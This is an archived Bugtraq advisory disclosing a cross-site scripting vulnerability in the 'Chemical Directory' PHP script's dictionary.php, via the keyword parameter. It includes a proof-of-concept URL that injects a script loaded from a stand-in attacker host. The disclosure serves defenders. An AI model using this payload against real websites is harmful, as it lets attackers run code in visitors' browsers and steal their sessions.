Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Chemical Directory - XSS

From: luny () youfucktard com
Date: 8 Jun 2006 00:21:43 -0000
Chemical Directory v.unknown (doesnt say on website) 

Homepage:
http://www.scriptsez.net/ 

Effected files:
dictionary.php

XSS Vulnerability via keyword variable:

http://www.example.com/dictionary.php?action=browse&keyword=e[SCRIPT SRC=http://evilsite.com/xss.js][/SCRIPT]
Previous By Date Next
Previous By Thread Next

Current thread: